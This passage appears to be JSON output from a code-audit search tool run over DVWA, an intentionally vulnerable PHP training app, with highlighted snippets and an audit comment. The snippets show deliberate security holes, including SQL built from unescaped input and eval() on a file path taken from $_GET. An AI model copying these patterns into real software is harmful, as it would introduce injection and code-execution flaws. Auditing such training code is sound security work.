  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span> <span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token 
punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>Something went wrong.&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
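  "note": "$id is assigned directly from $_SESSION['id'] (line 5), embedded in the quoted SQL literal on line 8 and executed by mysqli_query() on line 9. No escaping or binding is visible in this snippet; use a prepared statement with a bound parameter and confirm where the session value is set."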
 },
 {
  "id": 244,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 221,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 263,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span 
class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 288,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token 
punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 302,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_SESSION",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token 
variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span>    <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 38,
  "file": "/home/chris/src/DVWA-master/hackable/flags/fi.php",
  "filetype": "php",
  "search": "\\sbase64_decode\\s*\\(",
  "match": "<span class=\"line-number\">15:</span> <span class=\"token variable\">$line3</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"3.) Romeo, Romeo! Wherefore art thou Romeo?\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$line3</span> <span class=\"token operator\">=</span> \"<span class=\"token operator\">-</span><span class=\"token operator\">-</span>LINE HIDDEN <span class=\"token comment\" spellcheck=\"true\">;)--\";</span>\n<span class=\"line-number\">17:</span> echo <span class=\"token variable\">$line3</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"\\n\\n&lt;br />&lt;br />\\n\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> <span class=\"token variable\">$line4</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"NC4pI\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"FRoZSBwb29s\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"IG9uIH\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"RoZSByb29mIG1\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"1c3QgaGF\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"2ZSBh\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"IGxlY\"</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">\"Wsu\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">20:</span> echo <span class=\"token function\">base64_decode</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$line4</span> <span class=\"token punctuation\">)</span><span class=\"token 
comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> <span class=\"token operator\">&lt;</span>!<span class=\"token operator\">-</span><span class=\"token operator\">-</span> <span class=\"token number\">5</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">)</span> The world isn<span class=\"token string\">'t run by weapons anymore, or energy, or money. It'</span>s run by little ones <span class=\"token operator\">and</span> zeroes<span class=\"token punctuation\">,</span> little bits of data<span class=\"token punctuation\">.</span> It's all just electrons<span class=\"token punctuation\">.</span> <span class=\"token operator\">-</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>\n<span class=\"line-number\">25:</span> ",
  "line": 20,
  "start": 15,
  "end": 26,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 32,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\sfile\\s*\\(",
  "match": "<span class=\"line-number\">17:</span> \treturn <span class=\"token string\">'0.6'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> }\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> PHPIDS Log parsing function\n<span class=\"line-number\">21:</span> function <span class=\"token function\">dvwaReadIdsLog</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">22:</span> \t<span class=\"token variable\">$file_array</span> <span class=\"token operator\">=</span> <span class=\"token function\">file</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS_LOG <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token function\">foreach</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file_array</span> as <span class=\"token variable\">$line_number</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$line</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$line</span> <span class=\"token operator\">=</span> <span class=\"token function\">explode</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\",\"</span><span class=\"token punctuation\">,</span> <span class=\"token 
variable\">$line</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 22,
  "start": 17,
  "end": 28,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 42,
  "file": "/home/chris/src/DVWA-master/instructions.php",
  "filetype": "php",
  "search": "\\sfile_get_contents\\s*\\(",
  "match": "<span class=\"line-number\">21:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$selectedDocId</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$docs</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$selectedDocId</span> <span class=\"token operator\">=</span> <span class=\"token string\">'readme'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> }\n<span class=\"line-number\">24:</span> <span class=\"token variable\">$readFile</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$docs</span><span class=\"token punctuation\">[</span> <span class=\"token variable\">$selectedDocId</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'file'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"highlight\"><span class=\"line-number\">26:</span> <span class=\"token variable\">$instructions</span> <span class=\"token operator\">=</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT<span class=\"token punctuation\">.</span><span class=\"token variable\">$readFile</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">27:</span> \n<span class=\"line-number\">28:</span> function <span class=\"token function\">urlReplace</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$matches</span> <span class=\"token 
punctuation\">)</span> {\n<span class=\"line-number\">29:</span> \treturn <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$matches</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">30:</span> }\n<span class=\"line-number\">31:</span> ",
  "line": 26,
  "start": 21,
  "end": 32,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 277,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/view_help.php",
  "filetype": "php",
  "search": "\\sfile_get_contents\\s*\\(",
  "match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span>       <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">ob_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> <span class=\"token function\">eval</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'?>'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/{$id}/help/help.php\"</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;?php '</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$help</span> <span class=\"token operator\">=</span> <span class=\"token function\">ob_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token function\">ob_end_clean</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"\n<span class=\"line-number\">20:</span> <span class=\"token operator\">&lt;</span>div class<span class=\"token operator\">=</span>\\<span class=\"token string\">\"body_padded\\\"</span><span class=\"token operator\">></span>",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 33,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\sfopen\\s*\\(",
  "match": "<span class=\"line-number\">39:</span> }\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Clear PHPIDS log\n<span class=\"line-number\">42:</span> function <span class=\"token function\">dvwaClearIdsLog</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\t{\n<span class=\"line-number\">43:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'clear_log'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">44:</span> \t\t<span class=\"token variable\">$fp</span> <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS_LOG<span class=\"token punctuation\">,</span> w <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">45:</span> \t\t<span class=\"token function\">fclose</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$fp</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">46:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS log cleared\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">47:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \t}\n<span class=\"line-number\">49:</span> }",
  "line": 44,
  "start": 39,
  "end": 50,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 1,
  "file": "/home/chris/src/DVWA-master/about.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">46:</span> \t<span class=\"token operator\">&lt;</span>h2<span class=\"token operator\">></span>License<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>\n<span class=\"line-number\">47:</span> \t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Damn Vulnerable Web Application <span class=\"token punctuation\">(</span>DVWA<span class=\"token punctuation\">)</span> is free software<span class=\"token punctuation\">:</span> you can redistribute it <span class=\"token operator\">and</span><span class=\"token operator\">/</span><span class=\"token operator\">or</span> modify\n<span class=\"line-number\">48:</span> \tit under the terms of the GNU General Public License as published by\n<span class=\"line-number\">49:</span> \tthe Free Software Foundation<span class=\"token punctuation\">,</span> either version <span class=\"token number\">3</span> of the License<span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span>\n<span class=\"line-number\">50:</span> \t<span class=\"token punctuation\">(</span>at your option<span class=\"token punctuation\">)</span> any later version<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>The PHPIDS library is included<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> good faith<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> this DVWA distribution<span class=\"token punctuation\">.</span> The operation of PHPIDS is provided without support from the DVWA team<span class=\"token punctuation\">.</span> It is licensed under <span class=\"token 
operator\">&lt;</span>a href<span class=\"token operator\">=</span>\\<span class=\"token string\">\"\"</span> <span class=\"token punctuation\">.</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"instructions.php?doc=PHPIDS-license\\\"</span><span class=\"token operator\">></span>separate terms<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>a<span class=\"token operator\">></span> <span class=\"token keyword\">to</span> the DVWA code<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">52:</span> \n<span class=\"line-number\">53:</span> \t<span class=\"token operator\">&lt;</span>h2<span class=\"token operator\">></span>Development<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>\n<span class=\"line-number\">54:</span> \t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Everyone is welcome <span class=\"token keyword\">to</span> contribute <span class=\"token operator\">and</span> help make DVWA as successful as it can be<span class=\"token punctuation\">.</span> All contributors can have their name <span class=\"token operator\">and</span> link <span class=\"token punctuation\">(</span><span class=\"token keyword\">if</span> they wish<span class=\"token punctuation\">)</span> placed <span class=\"token keyword\">in</span> the credits section<span class=\"token punctuation\">.</span> <span class=\"token keyword\">To</span> contribute pick an Issue from the Project Home <span class=\"token keyword\">to</span> work on <span class=\"token operator\">or</span> submit a patch <span class=\"token keyword\">to</span> the Issues list<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token 
operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">55:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span>\\n\"<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">56:</span> ",
  "line": 51,
  "start": 46,
  "end": 57,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 25,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\sinclude",
